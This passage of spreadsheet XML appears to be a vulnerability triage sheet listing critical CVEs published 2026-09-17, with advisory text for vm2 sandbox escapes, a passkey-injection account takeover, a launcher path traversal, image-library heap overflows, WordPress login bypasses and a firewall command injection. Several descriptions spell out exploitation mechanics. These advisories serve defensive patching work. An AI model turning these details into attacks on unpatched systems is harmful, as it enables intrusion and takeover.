        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in M365 Copilot allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85885</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92938</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.3 through 3.11.6 expose Node.js's host node:sqlite module to code running in NodeVM when that builtin is permitted, either explicitly or through builtin: ['*']. The module is wrapped with vm.readonly(), which prevents property assignment but leaves host-authority callables reachable; in addition, the resolver treats any request starting with 'node:' as a core-module request and the runtime strips only one 'node:' prefix, so a sandbox request for 'node:node:sqlite' resolves to the configured node:sqlite entry. Sandboxed code can therefore create an in-memory DatabaseSync with extension loading enabled and call DatabaseSync.loadExtension() on a native library bundled in the untrusted plugin package (path derived from __dirname). SQLite loads the library into the Node.js host process and invokes its native entry point, giving the sandboxed plugin arbitrary native code execution outside the sandbox with the host process's privileges. The issue is fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92938</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92948</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>vm2 versions &gt;= 3.9.6 and &lt;= 3.11.6 are affected by a NodeVM builtin allowlist bypass that permits a sandbox escape on Node.js 24 and newer when the embedder explicitly allows the node:test builtin (e.g. require: { builtin: ['node:test'] }). On Node.js 24+, module.builtinModules exposes the scheme-only key node:test, which is not covered by vm2's family-based DANGEROUS_BUILTINS protection, so it is stored in the generic host-passthrough loader. Because requireImpl() in lib/setup-node-sandbox.js strips a single 'node:' prefix before the builtin lookup, sandbox code calling require('node:node:test') resolves to the stored node:test key and receives a readonly proxy to the host module. Calls to node:test.run() are forwarded to the host implementation, which spawns a separate Node process for process-isolated test execution and passes through attacker-controlled execArgv values; supplying --eval=&lt;JavaScript&gt; therefore executes arbitrary JavaScript in an unrestricted host Node process outside the NodeVM sandbox. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92948</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45140</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>composer:chamilo/chamilo-lms</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>2.0.1</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-219, CWE-22, CWE-434, CWE-94</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Chamilo LMS is an open-source learning management system. Prior to 2.0.1, Chamilo LMS allows an unauthenticated remote attacker to execute arbitrary code on the server. The authoritative advisory does not identify the affected endpoint, component, input, or exploitation mechanism. This issue is fixed in version 2.0.1.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45140</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54460</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to 1.1.1, POST /api/auth/passkeys accepts a request-body userId and attacker-supplied passkey without an authenticated session, does not call WebAuthnService.verifyRegistration, and does not bind enrollment to locals.user.id. An unauthenticated attacker who knows the public tenant ID and the target staff email can use the public booking bootstrap and GET /api/tenants/[id]/appointments/staff-public-keys to obtain candidate userId values. The attacker first causes UserService.addAdditionalPasskey to store a controlled public key for a candidate userId, then attempts login with the target email; the login check compares verificationResult.userId with the email-resolved account and reveals whether the injected credential belongs to that target. Repeating this injection-before-login sequence identifies the matching userId, and the normal login endpoint accepts the attacker's assertion for the stored key and creates a STAFF session. The session can expose tenant data and reveal TENANT_ADMIN identifiers for further takeover; GLOBAL_ADMIN accounts are not reachable through this tenant-scoped path. A hijacked TENANT_ADMIN can modify or delete tenant resources and key shares, potentially making appointment data permanently undecryptable and taking booking services offline. This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54460</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54617</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22, CWE-522</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>GravitLauncher is an open-source Minecraft launcher based on sashok724's v3. Prior to 5.7.12, an unauthenticated remote actor can send a raw HTTP request target without a leading slash to the default LaunchServer file server on port 9274. FileServerHandler.channelRead0 in components/launchserver/src/main/java/pro/gravit/launchserver/socket/handlers/fileserver/FileServerHandler.java strips the first request-target character and resolves the remaining path against updatesDir without re-normalizing and verifying containment. This leaves parent-directory components in a no-leading-slash request and allows reading any file accessible to the LaunchServer process, including .keys/ecdsa_id, .keys/legacySalt, and LaunchServer.json. Disclosure of those files can expose signing keys, refresh-token material, and database credentials, enabling forged administrative access tokens and full authentication bypass. A normalizing L7 proxy may block the primary request form, but direct exposure and L4/TCP proxies remain affected, and netty.fileServerEnabled is enabled by default. This issue is fixed in 5.7.12.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54617</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54626</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. In 0.9.10 and earlier, the TGA_INDEXED_RLE path selected by image_type == 9 allocates an image buffer using the one-byte-per-pixel SAIL_PIXEL_FORMAT_BPP8_INDEXED format returned by tga_private_sail_pixel_format() in src/sail-codecs/tga/helpers.c, while sail_codec_load_frame_v8_tga() in src/sail-codecs/tga/tga.c derives a two-to-four-byte pixel_size from an attacker-controlled header bpp value from 9 through 32. Loading a crafted color-mapped run-length-encoded TGA through sail_load_from_file() or sail_load_from_memory() therefore writes attacker-controlled bytes beyond the heap pixel buffer. The pixel-count clamp added for CVE-2026-40494 does not constrain the per-pixel write width, so this issue is an incomplete fix of that vulnerability and can cause heap corruption, a reliable crash, or potential code execution. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54626</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54627</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. In 0.9.10 and earlier, psd_private_sail_pixel_format() in src/sail-codecs/psd/helpers.c resolves a one-channel PSD in Bitmap color mode to SAIL_PIXEL_FORMAT_BPP1_INDEXED without requiring the file depth to be one, so the pixel buffer uses one-bit rows while sail_codec_load_frame_v8_psd() in src/sail-codecs/psd/psd.c accepts depth == 8 and writes one attacker-controlled byte per pixel. Loading a crafted PSD through sail_load_from_file() or sail_load_from_memory() therefore writes beyond each heap row, causing memory corruption, a reliable crash, or potential code execution. This mode/depth mismatch is distinct from GHSA-rcqx-gc76-r9mv and GHSA-wcj8-hxxf-pq2c. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54627</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62101</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Authentication in EduAdmin Booking &lt;= 5.4.2 versions.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62101</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62108</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Authentication in Headless Single Sign On &lt;= 1.7.0 versions.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62108</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86707</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>The Private Feed Key WordPress plugin through 0.1 does not verify that the key used to authenticate a feed request is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86707</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86709</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>The Pressengine WordPress plugin through 1.0 does not stop its login handler from issuing a session when authentication fails, allowing unauthenticated attackers to log in as any user, including administrators.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86709</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86710</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>The Login with QR WordPress plugin through 1.0.0 does not verify that the code used to log a user in is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86710</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87796</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>The Multi Uploader for Gravity Forms plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.1.9 via the move_file function. This is due to insufficient file type validation during chunked upload handling. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87796</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90822</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>contact@securifera.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>FatPipe MPVPN, WARP, and IPVPN appliances running the end-of-life firmware version 10.1.2r60p100 contain an OS command injection vulnerability in the xtremed daemon. An unauthenticated remote attacker with access to the affected management interface can submit crafted input to the AuthFormServlet endpoint, causing authentication data to be processed by a shell and allowing arbitrary commands to execute as root.
The affected management interface is disabled by default and must be affirmatively enabled by the customer before the endpoint becomes reachable. FatPipe recommends restricting management access to trusted administrative networks and using WAN access control lists to limit access to trusted sources.
Customers running the affected end-of-life firmware can contact FatPipe Support for help confirming their firmware version and upgrading to a current supported release at https://www.fatpipeinc.com/support/support, support@fatpipeinc.com, or +1 800-724-8521 (option 3).</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90822</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
